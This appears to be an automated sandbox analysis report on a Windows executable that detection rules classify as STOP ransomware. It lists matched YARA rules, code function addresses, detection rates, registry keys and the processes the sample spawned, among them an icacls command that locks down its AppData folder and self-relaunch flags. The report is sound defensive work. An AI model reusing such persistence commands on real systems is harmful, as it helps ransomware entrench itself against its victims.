Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 4004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5720, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5592, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 4376, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3616, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5828, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5832, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3920, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bE5aaTiJM0.exe PID: 2888, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040D240	2_2_0040D240
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00419F90	2_2_00419F90
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040C070	2_2_0040C070
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0042E003	2_2_0042E003
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0042F010	2_2_0042F010
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0044237E	2_2_0044237E
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_004344FF	2_2_004344FF
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00449506	2_2_00449506
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0043E5A3	2_2_0043E5A3
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0044B5B1	2_2_0044B5B1
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040A660	2_2_0040A660
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0041E690	2_2_0041E690
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040274E	2_2_0040274E
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040A710	2_2_0040A710
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040F730	2_2_0040F730
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0044D7A1	2_2_0044D7A1
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0042C804	2_2_0042C804
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0044D9DC	2_2_0044D9DC
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00449A71	2_2_00449A71
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0044ACFF	2_2_0044ACFF
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040DD40	2_2_0040DD40
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0040BDC0	2_2_0040BDC0
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_0042CE51	2_2_0042CE51
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00420F30	2_2_00420F30
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00449FE3	2_2_00449FE3

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: String function: 0042F7C0 appears 37 times
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: String function: 00428520 appears 51 times
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: String function: 004547A0 appears 31 times

Source: bE5aaTiJM0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bE5aaTiJM0.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: bE5aaTiJM0.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bE5aaTiJM0.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: bE5aaTiJM0.exe	Virustotal: Detection: 39%
Source: bE5aaTiJM0.exe	ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

File read: C:\Users\user\Desktop\bE5aaTiJM0.exe

Jump to behavior

Source: bE5aaTiJM0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
Source: unknown	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart	Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

File created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@18/215@6/2

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

